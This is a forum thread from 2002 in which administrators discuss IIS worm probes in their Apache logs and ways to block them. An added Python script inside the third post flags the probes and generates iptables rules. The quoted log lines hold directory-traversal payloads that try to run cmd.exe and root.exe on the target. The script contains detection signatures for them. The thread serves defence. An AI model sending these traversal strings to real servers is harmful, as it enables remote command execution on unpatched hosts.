Thread: IIS virus attacks

  1. #1
    Mentor
    Join Date
    Jun 2001
    Posts
    1,672

    IIS virus attacks

    My apache log is full of entries like this:

    Code:
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:13 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 270 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:13 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 268 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:14 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:14 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:14 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:15 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:15 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:15 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:15 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:16 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:16 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:16 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:17 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:17 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:17 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:18 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
    I take it it is one of those IIS viruses. I was wondering if there was a way of fighting back. Can I automatically block out IP addresses that send out this crap?

  2. #2

    Re: IIS virus attacks

    If you are using a kernel newer than 2.4.9, you can use the "string" module in your iptables rules to block packets containing strings like that.

    The only downside is that the worm will still establish a connection to your Apache; it just won't be able to do anything after that. The connection will be forced to time out, which is kind of bad.

  3. #3
    Moderator
    Good Guru
    Compunuts's Avatar
    Join Date
    May 2001
    Location
    California
    Posts
    3,935

    Re: IIS virus attacks

    It's easier to just run a script with cron and take out the log entries...... I've had plenty of those .....
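    Posts #1 to #3 above ask how to pick these probe entries out of the Apache log, block the hosts that send them, and keep the log readable. The script below is an added example, not code from anyone in this thread: it parses lines in Apache's common/combined format, tallies probe requests per source host, separates the matched lines from the clean ones (so they can be moved to a quarantine file rather than deleted), and emits the iptables commands an admin would review before applying. The embedded sample log consists of six lines copied from post #1 plus constructed lines from documentation-range addresses (192.0.2.10, 198.51.100.7); the signature list, the threshold of three probes, and the choice of REJECT with a TCP reset (which closes the connection instead of letting it time out, the downside post #2 mentions) are my assumptions.

```python
import re
from collections import Counter

# Constructed sample: six lines copied from post #1 plus three made-up lines
# (documentation-range addresses 192.0.2.10 and 198.51.100.7) and one junk line.
SAMPLE_LOG = """\
evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:13 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 270 "-" "-"
evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:13 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 268 "-" "-"
evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:14 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278 "-" "-"
evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:14 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:16 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:17 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 "-" "-"
192.0.2.10 - - [01/Mar/2002:10:05:01 -0500] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/4.0"
198.51.100.7 - - [01/Mar/2002:10:06:30 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
192.0.2.10 - - [01/Mar/2002:10:07:12 -0500] "POST /cgi-bin/guestbook.pl HTTP/1.1" 200 512 "http://example.com/index.html" "Mozilla/4.0"
this line is not an access-log record
"""

# Apache common/combined log prefix: host ident user [time] "method uri proto" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) (?P<proto>HTTP/\d\.\d)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Signatures of the IIS worm probes seen in the thread (assumed list): a request
# for the command shell itself, or ".." followed by a double-encoded or
# overlong-UTF-8 path separator, the traversal spellings in the log above.
PROBE_PATTERNS = (
    re.compile(r'/(?:cmd|root)\.exe', re.I),
    re.compile(r'\.\.%(?:25|%|c0|c1)', re.I),
)


def parse_line(line):
    """Return the fields of one log line, or None if it is not a request record."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_probe(uri):
    """True if the request URI matches one of the worm probe signatures."""
    return any(p.search(uri) for p in PROBE_PATTERNS)


def triage(log_text):
    """Split a log into probe, clean and unparsable lines and count probes per host."""
    hits = Counter()
    probes, clean, unparsed = [], [], []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec is None:
            unparsed.append(line)      # keep, never silently drop, what we cannot parse
        elif is_probe(rec["uri"]):
            hits[rec["host"]] += 1
            probes.append(line)        # candidate for a quarantine file
        else:
            clean.append(line)
    return hits, probes, clean, unparsed


def block_rules(hits, threshold=3):
    """iptables commands for every host that sent at least `threshold` probes.
    REJECT with a TCP reset closes the worm's connection at once instead of
    leaving it to time out as DROP would. With HostnameLookups on, hosts appear
    as names; iptables resolves a name once, at insertion time, so resolve and
    review the list before running these."""
    return [
        f"iptables -I INPUT -p tcp --dport 80 -s {host} -j REJECT --reject-with tcp-reset"
        for host, n in sorted(hits.items())
        if n >= threshold
    ]


def string_match_rule(needle="cmd.exe"):
    """Payload-matching alternative (the iptables 'string' match) that covers all
    sources with one rule. --algo is required by the xt_string module of 2.6+
    kernels; the 2.4-era patch did not have it."""
    return (f'iptables -I INPUT -p tcp --dport 80 -m string --algo bm '
            f'--string "{needle}" -j REJECT --reject-with tcp-reset')


if __name__ == "__main__":
    hits, probes, clean, unparsed = triage(SAMPLE_LOG)
    for host, n in hits.most_common():
        print(f"{n:4d}  {host}")
    print(f"{len(probes)} probe lines, {len(clean)} clean, {len(unparsed)} unparsed")
    for rule in block_rules(hits):
        print(rule)
    print(string_match_rule())
```

    Run it against a real log with `triage(open("access_log").read())`; the per-host counts are what you would feed a cron job, and the returned `probes` list is what post #3's script should write to a separate file instead of discarding.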

  4. #4

    Re: IIS virus attacks

    My apache log is full of entries like this:

    Code:
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:13 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 270 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:13 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 268 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:14 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:14 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:14 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:15 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:15 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:15 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:15 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:16 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:16 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:16 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:17 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:17 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:17 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
    evrtwa1-ar9-4-34-134-119.evrtwa1.vz.dsl.gtei.net - - [01/Mar/2002:10:04:18 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 "-" "-"
    I take it it is one of those IIS viruses. I was wondering if there was a way of fighting back. Can I automatically block out IP addresses that send out this crap?
    evrtwa1, eh? That's Everett, Washington... I've been hit by a few script kiddies from that node...

  5. #5
    Moderator
    Good Guru
    Compunuts's Avatar
    Join Date
    May 2001
    Location
    California
    Posts
    3,935

    Re: IIS virus attacks

    This is the reason why a bigger pipe can actually be dangerous .... Those clueless people bring down many legitimate uses of the high-speed net .....

  6. #6

    Re: IIS virus attacks

    Hey Cloverm,

    I just ran through my logs here and I am getting those exact same entries..... They seem to be pretty consistent and coming from a variety of sources.

  7. #7
    Senior Member
    Join Date
    May 2001
    Posts
    472

    Re: IIS virus attacks

    I *still* get the original Code Red stuff in my logs...

    Anyway, we know these machines are infected 'cause they are sending it out right? So just how does that exploit work anyway?

  8. #8
    Mentor
    Join Date
    Jun 2001
    Posts
    1,672

    Re: IIS virus attacks

    I *still* get the original Code Red stuff in my logs...

    Anyway, we know these machines are infected 'cause they are sending it out right? So just how does that exploit work anyway?
    Well it starts with a stupid, careless guy who uses M$ software and calls himself "Administrator".

  9. #9

    Re: IIS virus attacks

    Well it starts with a stupid, careless guy who uses M$ software and calls himself "Administrator".
    And with any luck at all, it ends with a stupid, careless guy who lives on the street because nobody will hire him.

  10. #10

    Re: IIS virus attacks
    And with any luck at all, it ends with a stupid, careless guy who lives on the street because nobody will hire him.
    maybe in a better future .. :-/
